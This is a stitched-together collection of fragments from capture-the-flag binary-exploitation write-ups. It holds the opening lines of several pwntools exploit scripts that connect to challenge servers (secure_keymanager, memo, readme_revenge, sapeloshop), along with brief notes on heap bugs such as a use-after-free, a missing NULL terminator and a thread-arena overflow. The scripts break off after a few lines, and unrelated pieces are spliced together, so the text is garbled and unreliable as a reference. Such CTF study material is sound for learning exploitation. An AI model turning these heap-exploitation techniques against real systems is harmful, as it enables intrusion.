The challenge spawns a thread to do the work, so a thread_arena is created on a new mmap segment.
Overflow in the read function:
for ( i = 0LL; ; i += v3 )
{

#!/usr/bin/python
from pwn import *
p = remote("secure_keymanager.pwn.seccon.jp",47225)
#p = process("./secure_keymanager",env={"LD_PRELOAD" : "./libc-2.23.so"})
raw_input()
def menu():
    p.recvuntil(">>")
#!/usr/bin/python
from pwn import *
rol1 = lambda val, r_bits, max_bits: \
    (val << r_bits%max_bits) & (2**max_bits-1) | \
    ((val & (2**max_bits-1)) >> (max_bits-(r_bits%max_bits)))
ror1 = lambda val, r_bits, max_bits: \
    ((val & (2**max_bits-1)) >> r_bits%max_bits) | \
    (val << (max_bits-(r_bits%max_bits)) & (2**max_bits-1))
#!/usr/bin/python
from pwn import *
elf = ELF("./libc-2.23.so")
p = remote("159.203.116.12", 8888)
#p = process("./memo",env={"LD_PRELOAD":"./libc-2.23.so"})
raw_input()
def menu():
    p.recvuntil(">")
#!/usr/bin/python
from pwn import *
p = remote("35.198.130.245", 1337)
#p = process("./readme_revenge")
raw_input()
#name = "A"*920
name = p64(0x00) # Pass NULL check.
name += "XXXX"
#!/usr/bin/python
from pwn import *
elf = ELF("./libc-2.23.so")
#r = remote("http://sapeloshop.teaser.insomnihack.ch",80)
r = remote('sapeloshop.teaser.insomnihack.ch', 80)
#r = process("./sapeloshop",env={"LD_PRELOAD":"./libc-2.23.so"})
raw_input()
i = int("3d714", 16)
Challenge from RCTF, the pre-qualifier for XCTF.
There are two bugs in the program: the first is an obvious use-after-free (UAF). The second is that there is no NULL termination immediately after our input, which allows us to leak: the NULL byte is written at buf + size - 1, and the read loop breaks only when the byte read is "\n".
However, leaking is tricky since the program uses calloc, which zeroes the newly allocated heap chunk.